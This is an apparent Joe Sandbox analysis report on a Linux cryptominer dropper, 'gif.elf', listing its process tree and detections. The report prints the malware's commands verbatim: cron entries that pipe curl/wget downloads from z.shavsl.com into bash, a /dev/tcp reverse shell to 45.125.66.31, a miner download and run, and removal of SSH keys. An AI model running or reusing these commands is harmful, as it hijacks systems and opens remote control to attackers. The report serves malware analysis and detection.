Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Linux Analysis Report
gif.elf

Overview

General Information

Sample name:gif.elf
Analysis ID:1633056
MD5:4711254a232e4cbd4d98deb46e757f1d
SHA1:93664323281e82fe36a847f785d6805891d20e42
SHA256:1ce1b7de294df5c603d080376caf27f5f09ac16ba1ace7356e23e43db75ed60c
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Drops invisible ELF files
Protects files from modification
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Terminates several processes with shell command 'killall'
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Removes protection from files
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1633056
Start date and time:2025-03-09 17:27:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 9s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:gif.elf
Detection:MAL
Classification:mal68.troj.evad.linELF@0/7@4/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: w.softprojectcode.com

Runtime Messages

Command:/tmp/gif.elf
PID:5473
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • gif.elf (PID: 5473, Parent: 5396, MD5: 4711254a232e4cbd4d98deb46e757f1d) Arguments: /tmp/gif.elf
    • gif.elf New Fork (PID: 5474, Parent: 5473)
      • gif.elf New Fork (PID: 5475, Parent: 5474)
        • gif.elf New Fork (PID: 5476, Parent: 5475)
        • sh (PID: 5476, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5477, Parent: 5476)
          • chattr (PID: 5477, Parent: 5476, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5478, Parent: 5475)
        • sh (PID: 5478, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5479, Parent: 5478)
          • rm (PID: 5479, Parent: 5478, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5480, Parent: 5475)
        • sh (PID: 5480, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5481, Parent: 5480)
          • chattr (PID: 5481, Parent: 5480, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5482, Parent: 5475)
        • sh (PID: 5482, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"
          • sh New Fork (PID: 5483, Parent: 5482)
          • chattr (PID: 5483, Parent: 5482, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /etc/cron.d
        • gif.elf New Fork (PID: 5484, Parent: 5475)
        • sh (PID: 5484, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"
          • sh New Fork (PID: 5485, Parent: 5484)
          • chattr (PID: 5485, Parent: 5484, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/crontab
        • gif.elf New Fork (PID: 5486, Parent: 5475)
        • sh (PID: 5486, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"
          • sh New Fork (PID: 5487, Parent: 5486)
          • chattr (PID: 5487, Parent: 5486, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /var/spool/cron
        • gif.elf New Fork (PID: 5488, Parent: 5475)
        • sh (PID: 5488, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"
          • sh New Fork (PID: 5489, Parent: 5488)
          • chattr (PID: 5489, Parent: 5488, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /var/spool/cron/crontabs
        • gif.elf New Fork (PID: 5490, Parent: 5475)
        • sh (PID: 5490, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"
          • sh New Fork (PID: 5491, Parent: 5490)
          • chattr (PID: 5491, Parent: 5490, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /etc/cron.hourly
        • gif.elf New Fork (PID: 5492, Parent: 5475)
        • sh (PID: 5492, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"
        • gif.elf New Fork (PID: 5493, Parent: 5475)
        • sh (PID: 5493, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"
        • gif.elf New Fork (PID: 5494, Parent: 5475)
        • sh (PID: 5494, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"
          • sh New Fork (PID: 5495, Parent: 5494)
          • chattr (PID: 5495, Parent: 5494, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /etc/cron.d/watch
        • gif.elf New Fork (PID: 5496, Parent: 5475)
        • sh (PID: 5496, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"
        • gif.elf New Fork (PID: 5497, Parent: 5475)
        • sh (PID: 5497, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"
        • gif.elf New Fork (PID: 5498, Parent: 5475)
        • sh (PID: 5498, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod 755 /etc/cron.hourly/prelink"
          • sh New Fork (PID: 5499, Parent: 5498)
          • chmod (PID: 5499, Parent: 5498, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 755 /etc/cron.hourly/prelink
        • gif.elf New Fork (PID: 5500, Parent: 5475)
        • sh (PID: 5500, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"
          • sh New Fork (PID: 5501, Parent: 5500)
          • chattr (PID: 5501, Parent: 5500, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /etc/cron.hourly/prelink
        • gif.elf New Fork (PID: 5502, Parent: 5475)
        • sh (PID: 5502, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5503, Parent: 5502)
          • chattr (PID: 5503, Parent: 5502, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5504, Parent: 5475)
        • sh (PID: 5504, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys"
          • sh New Fork (PID: 5505, Parent: 5504)
          • rm (PID: 5505, Parent: 5504, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys
        • gif.elf New Fork (PID: 5506, Parent: 5475)
        • sh (PID: 5506, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys"
          • sh New Fork (PID: 5507, Parent: 5506)
          • chattr (PID: 5507, Parent: 5506, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys
        • gif.elf New Fork (PID: 5508, Parent: 5475)
        • sh (PID: 5508, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5509, Parent: 5508)
          • chattr (PID: 5509, Parent: 5508, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5510, Parent: 5475)
        • sh (PID: 5510, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5511, Parent: 5510)
          • rm (PID: 5511, Parent: 5510, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5512, Parent: 5475)
        • sh (PID: 5512, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5513, Parent: 5512)
          • chattr (PID: 5513, Parent: 5512, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5514, Parent: 5475)
        • sh (PID: 5514, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"
          • sh New Fork (PID: 5515, Parent: 5514)
          • curl (PID: 5515, Parent: 5514, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
        • gif.elf New Fork (PID: 5591, Parent: 5475)
        • sh (PID: 5591, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"
          • sh New Fork (PID: 5592, Parent: 5591)
          • chattr (PID: 5592, Parent: 5591, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /tmp/python
        • gif.elf New Fork (PID: 5593, Parent: 5475)
        • sh (PID: 5593, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"
          • sh New Fork (PID: 5594, Parent: 5593)
          • chattr (PID: 5594, Parent: 5593, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia chattr -ia /usr/bin/bsd-port/getty
        • gif.elf New Fork (PID: 5595, Parent: 5475)
        • sh (PID: 5595, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"
          • sh New Fork (PID: 5596, Parent: 5595)
          • chattr (PID: 5596, Parent: 5595, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/.sshd
        • gif.elf New Fork (PID: 5597, Parent: 5475)
        • sh (PID: 5597, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"
          • sh New Fork (PID: 5598, Parent: 5597)
          • chattr (PID: 5598, Parent: 5597, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/rc.d/init.d/selinux
        • gif.elf New Fork (PID: 5599, Parent: 5475)
        • sh (PID: 5599, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"
          • sh New Fork (PID: 5600, Parent: 5599)
          • chattr (PID: 5600, Parent: 5599, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/rc.d/init.d/DbSecuritySp
        • gif.elf New Fork (PID: 5601, Parent: 5475)
        • sh (PID: 5601, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"
          • sh New Fork (PID: 5602, Parent: 5601)
          • chattr (PID: 5602, Parent: 5601, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/sh.sh
        • gif.elf New Fork (PID: 5603, Parent: 5475)
        • sh (PID: 5603, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"
          • sh New Fork (PID: 5604, Parent: 5603)
          • chattr (PID: 5604, Parent: 5603, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/cron.hourly/cron.sh
        • gif.elf New Fork (PID: 5605, Parent: 5475)
        • sh (PID: 5605, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"
          • sh New Fork (PID: 5606, Parent: 5605)
          • chattr (PID: 5606, Parent: 5605, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /lib/udev/udev /lib/udev/debug
        • gif.elf New Fork (PID: 5607, Parent: 5475)
        • sh (PID: 5607, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"
          • sh New Fork (PID: 5608, Parent: 5607)
          • chattr (PID: 5608, Parent: 5607, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/xrig
        • gif.elf New Fork (PID: 5609, Parent: 5475)
        • sh (PID: 5609, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "killall .sshd xrig getty > /dev/null 2>&1 "
          • sh New Fork (PID: 5610, Parent: 5609)
          • killall (PID: 5610, Parent: 5609, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall .sshd xrig getty
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Spreading
  • Networking
  • System Summary
  • Persistence and Installation Behavior
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Lowering of HIPS / PFW / Operating System Security Settings

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: gif.elfVirustotal: Detection: 9%Perma Link
Source: gif.elfString: md5sum %s/usr/sbin/sestatus/usr/sbin/setenforcedisabled/etc/selinux/config/tmp/uninstall.shlsmod |grep -i AliSecGuard/root/.ssh/usr/bin/chattrrm -rf %schattr +i %s/etc/cron.d/var/spool/cron/crontabs/etc/cron.hourly/usr/include/%s/usr/include/usr/bin/curl/usr/bin/wget/usr/bin/cur/usr/bin/url/usr/bin/wge/usr/bin/get/usr/bin/cd1/usr/bin/cdt/usr/bin/wd1%cAliYunDunMonitorAliYunDunUpdateAliYunDungold%d.tar.gzgold%d-%d.tar.gz/usr/include/gold%d./install.sh/usr/bin/infocmpedanolis%d.tar.gzanolis%d-%d.tar.gz/usr/include/anolis%drocky%d.tar.gzrocky%d-%d.tar.gz/usr/include/rocky%dstream%d.tar.gzstream%d-%d.tar.gz/usr/include/stream%deuler%d.tar.gzeuler%d-%d.tar.gz/usr/include/euler%dredhatubuntudebian0.0.22version %s
Source: /usr/bin/curl (PID: 5515)Reads hosts file: /etc/hostsJump to behavior
Source: global trafficHTTP traffic detected: GET /miner HTTP/1.1Host: w.softprojectcode.comUser-Agent: curl/7.68.0Accept: */*
Source: global trafficDNS traffic detected: DNS query: w.softprojectcode.com
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: gif.elfString found in binary or memory: http://w.softprojectcode.com/%s
Source: gif.elfString found in binary or memory: http://w.softprojectcode.com/miner
Source: gif.elf, watch.48.dr, watch.50.drString found in binary or memory: http://z.shavsl.com/b
Source: classification engineClassification label: mal68.troj.evad.linELF@0/7@4/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5481)Args: chattr +i /root/.ssh/authorized_keys2Jump to behavior
Source: /bin/sh (PID: 5495)Args: chattr +i /etc/cron.d/watchJump to behavior
Source: /bin/sh (PID: 5501)Args: chattr +i /etc/cron.hourly/prelinkJump to behavior
Source: /bin/sh (PID: 5507)Args: chattr +i /root/.ssh/authorized_keysJump to behavior
Source: /bin/sh (PID: 5513)Args: chattr +i /root/.ssh/authorized_keys2Jump to behavior
Source: /bin/sh (PID: 5492)File: /etc/cron.d/watchJump to behavior
Source: /bin/sh (PID: 5493)File: /etc/cron.d/watchJump to behavior
Source: /bin/sh (PID: 5496)File: /etc/cron.hourly/prelinkJump to behavior
Source: /bin/sh (PID: 5497)File: /etc/cron.hourly/prelinkJump to behavior
Source: /usr/bin/chmod (PID: 5499)File: /etc/cron.hourly/prelink (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/sh (PID: 5610)Killall command executed: killall .sshd xrig gettyJump to behavior
Source: /tmp/gif.elf (PID: 5475)Directory: /root/.sshJump to behavior
Source: /usr/bin/chattr (PID: 5477)Directory: /root/.sshJump to behavior
Source: /usr/bin/chattr (PID: 5477)Directory: /root/.sshJump to behavior
Source: /usr/bin/chattr (PID: 5483)Directory: /etc/cron.d/.placeholderJump to behavior
Source: /usr/bin/chattr (PID: 5487)Directory: /var/spool/cron/atjobs/.SEQJump to behavior
Source: /usr/bin/chattr (PID: 5491)Directory: /etc/cron.hourly/.placeholderJump to behavior
Source: /usr/bin/chattr (PID: 5503)Directory: /root/.sshJump to behavior
Source: /usr/bin/chattr (PID: 5503)Directory: /root/.sshJump to behavior
Source: /usr/bin/chattr (PID: 5509)Directory: /root/.sshJump to behavior
Source: /usr/bin/chattr (PID: 5509)Directory: /root/.sshJump to behavior
Source: /usr/bin/curl (PID: 5515)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5515)File: /tmp/.minerJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/230/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/110/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/231/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/3638/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/111/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/232/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/112/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/233/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/113/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/234/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/114/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/235/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/115/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/236/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/116/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/237/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/117/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/238/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/118/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/239/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/119/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/914/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/10/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/917/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/11/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/12/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/13/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/14/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/15/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/16/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/17/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/18/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/19/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/240/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/3095/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/120/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/241/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/121/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/242/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/1/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/122/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/243/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/2/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/123/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/244/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/3/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/124/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/245/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/1588/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/125/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/4/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/246/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/126/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/5/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/247/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/127/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/6/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/248/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/128/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/7/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/249/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/129/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/8/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/800/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/9/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/1906/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/802/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/803/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/20/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/21/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/22/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/23/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/24/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/25/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/26/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/27/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/28/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/29/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/3420/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/1482/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/490/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/1480/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/250/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/371/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/130/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/251/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/131/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/252/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/132/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/253/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/254/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/1238/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/134/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/255/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/256/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/257/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/378/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/3413/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/258/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/259/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/1475/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/936/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/30/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/816/statJump to behavior
Source: /usr/bin/killall (PID: 5610)File opened: /proc/35/statJump to behavior
Source: /tmp/gif.elf (PID: 5476)Shell command executed: sh -c "chattr -ia -R /root/.ssh"Jump to behavior
Source: /tmp/gif.elf (PID: 5478)Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys2"Jump to behavior
Source: /tmp/gif.elf (PID: 5480)Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys2"Jump to behavior
Source: /tmp/gif.elf (PID: 5482)Shell command executed: sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5484)Shell command executed: sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5486)Shell command executed: sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5488)Shell command executed: sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5490)Shell command executed: sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5492)Shell command executed: sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"Jump to behavior
Source: /tmp/gif.elf (PID: 5493)Shell command executed: sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"Jump to behavior
Source: /tmp/gif.elf (PID: 5494)Shell command executed: sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5496)Shell command executed: sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"Jump to behavior
Source: /tmp/gif.elf (PID: 5497)Shell command executed: sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"Jump to behavior
Source: /tmp/gif.elf (PID: 5498)Shell command executed: sh -c "chmod 755 /etc/cron.hourly/prelink"Jump to behavior
